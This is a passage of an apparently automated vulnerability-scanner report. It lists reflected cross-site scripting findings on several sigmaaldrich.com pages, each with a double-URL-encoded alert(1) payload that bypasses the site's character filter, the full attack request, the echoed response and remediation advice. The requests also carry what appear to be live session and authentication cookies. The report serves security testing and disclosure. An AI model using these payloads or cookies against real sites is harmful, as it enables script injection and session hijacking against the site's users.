GET /life-science/cb5b4%2522%253balert%25281%2529%252f%252fec1a260ed13 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:34 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/cb5b4";alert(1)//ec1a260ed13","E404") ;
   </script>
...[SNIP]...

1.575. http://www.sigmaaldrich.com/life-science/stem-cell-biology.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/stem-cell-biology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b20%2522%253balert%25281%2529%252f%252f71cc7d9f3b0 was submitted in the REST URL parameter 1. This input was echoed as 26b20";alert(1)//71cc7d9f3b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science26b20%2522%253balert%25281%2529%252f%252f71cc7d9f3b0/stem-cell-biology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:34 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science26b20";alert(1)//71cc7d9f3b0/stem-cell-biology.html","E404") ;
   </script>
...[SNIP]...

1.576. http://www.sigmaaldrich.com/life-science/stem-cell-biology.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/stem-cell-biology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78272%2522%253balert%25281%2529%252f%252fd0ac7e987c1 was submitted in the REST URL parameter 2. This input was echoed as 78272";alert(1)//d0ac7e987c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/78272%2522%253balert%25281%2529%252f%252fd0ac7e987c1 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:41 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/78272";alert(1)//d0ac7e987c1","E404") ;
   </script>
...[SNIP]...

1.577. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/your-favorite-gene-search.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b09c%2522%253balert%25281%2529%252f%252fafc4591bf96 was submitted in the REST URL parameter 1. This input was echoed as 1b09c";alert(1)//afc4591bf96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science1b09c%2522%253balert%25281%2529%252f%252fafc4591bf96/your-favorite-gene-search.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:36 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science1b09c";alert(1)//afc4591bf96/your-favorite-gene-search.html","E404") ;
   </script>
...[SNIP]...

1.578. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/your-favorite-gene-search.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bbc4%2522%253balert%25281%2529%252f%252f294f16f8613 was submitted in the REST URL parameter 2. This input was echoed as 6bbc4";alert(1)//294f16f8613 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/6bbc4%2522%253balert%25281%2529%252f%252f294f16f8613 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:38 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/6bbc4";alert(1)//294f16f8613","E404") ;
   </script>
...[SNIP]...

1.579. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/your-favorite-gene-search/yfg-pbi.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33260%2522%253balert%25281%2529%252f%252fd3b818a82c5 was submitted in the REST URL parameter 1. This input was echoed as 33260";alert(1)//d3b818a82c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science33260%2522%253balert%25281%2529%252f%252fd3b818a82c5/your-favorite-gene-search/yfg-pbi.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
